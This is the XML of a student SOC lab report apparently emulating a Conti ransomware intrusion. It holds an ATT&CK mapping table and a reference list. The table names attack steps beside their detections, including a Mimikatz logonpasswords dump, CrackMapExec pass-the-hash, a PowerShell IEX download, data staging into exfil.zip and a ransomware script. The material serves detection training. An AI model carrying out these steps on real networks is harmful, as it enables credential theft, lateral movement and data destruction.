        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Boot / Logon Autostart: Registry Run Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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HKCU Run key check (no key planted — primary persistence via task)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Registry audit via Wazuh FIM (planned)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1078" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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Sliver HTTP beacon (30s jitter default); deviation: Meterpreter also used for Phase 4-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Sysmon EID 3: periodic outbound — 30s interval, same process/dest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="896" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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PowerShell IEX download of Atomic Red Team modules from GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Sysmon EID 3: PS outbound to raw.githubusercontent.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1078" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1003.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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OS Credential Dumping: LSASS Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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Kiwi (Mimikatz) via Sliver: sekurlsa::logonpasswords / creds_all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Sysmon EID 10 (TargetImage: lsass.exe) + Custom Rule 100010 → Level 15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1078" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1021.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Remote Services: SMB / Windows Admin Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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CrackMapExec Pass-the-Hash using stolen NTLM hash to FS01 and DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Windows EID 4624 on FS01 + DC01: Logon Type 3, Package: NTLM, Src: 10.10.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1261" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1021.006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Remote Services: Windows Remote Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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Evil-WinRM session using domain admin credentials on FS01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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EID 4624 (WinRM logon) + Sysmon EID 1 (wsmprovhost.exe) on FS01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1261" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1074.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Data Staged: Local Data Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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Copy of all SMB share contents to C:\Windows\Temp\stage; Compress-Archive → exfil.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Wazuh FIM: burst of 50+ file access events across all 4 shares within 60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="789" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110"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T1048</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386"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Exfiltration Over Alternative Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251"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Simulated (archive created; exfiltration channel not executed in lab)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EBF5FB"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FIM: exfil.zip creation in Temp directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1089" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110"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T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386"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Data Encrypted for Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251"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PowerShell ransomware script: AES encryption → .CONTI extension; ransom note dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>FIM burst: 20+ modifications in &lt;30s + EXT change + HOW_TO_DECRYPT.txt; Rule 100020 → Level 15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10.  References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST SP 800-61 Rev. 2 — Computer Security Incident Handling Guide. National Institute of Standards and Technology, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SANS Institute — Incident Handler's Handbook, Rob VandenBrink. SANS Reading Room.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PricewaterhouseCoopers Ireland — HSE Conti Ransomware Attack: Post-Incident Review. December 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CISA Advisory AA21-265A — Conti Ransomware. Cybersecurity and Infrastructure Security Agency, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK Framework v14 — Enterprise Matrix. https://attack.mitre.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wazuh Documentation v4.7. https://docs.wazuh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Red Canary — Atomic Red Team Project. https://github.com/redcanaryco/atomic-red-team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SwiftOnSecurity — Sysmon Configuration. https://github.com/SwiftOnSecurity/sysmon-config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> BishopFox — Sliver C2 Framework. https://github.com/BishopFox/sliver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PICERL Framework — SANS Internet Storm Center Incident Handling Process Reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CrackMapExec Documentation. https://github.com/Porchetta-Industries/CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="20"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc7049"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>End of Report —</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Spider Wizard SOC Lab  |  DEPI 2026  </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SimSun">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Courier New">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6E4F0"/>
      </w:pBdr>
      <w:spacing w:before="100" w:after="0"/>
      <w:jc w:val="end"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL — Academic/Research Use Only  |  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6E4F0"/>
      </w:pBdr>
      <w:spacing w:before="100" w:after="0"/>
      <w:jc w:val="end"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL — Academic/Research Use Only  |  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jc w:val="end"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="55" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>22225</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>94615</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1173480" cy="1081405"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="3" name="Picture 15" descr="channels4_profil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channels4_profile-removebg-preview"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect l="17802" t="19745" r="18346" b="13183"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1173480" cy="1081405"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="1503680" cy="1397000"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="4" name="Picture 14" descr="images-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images-removebg-preview"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1503680" cy="1397000"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>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1828800" cy="154305"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="5" name="Text Box 10"/>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Header"/>
                            <w:rPr/>
                          </w:pPr>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:t>1</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
                      <a:spAutoFit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" stroked="f" o:allowincell="f" style="position:absolute;margin-left:180pt;margin-top:0pt;width:143.95pt;height:12.1pt;mso-wrap-style:none;v-text-anchor:top;mso-position-horizontal:center;mso-position-horizontal-relative:margin">
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="6480" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="Header"/>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jc w:val="end"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="55" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>22225</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>94615</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1173480" cy="1081405"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="6" name="Picture 15" descr="channels4_profil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descr="channels4_profile-removebg-preview"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect l="17802" t="19745" r="18346" b="13183"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1173480" cy="1081405"/>
                  </a:xfrm>
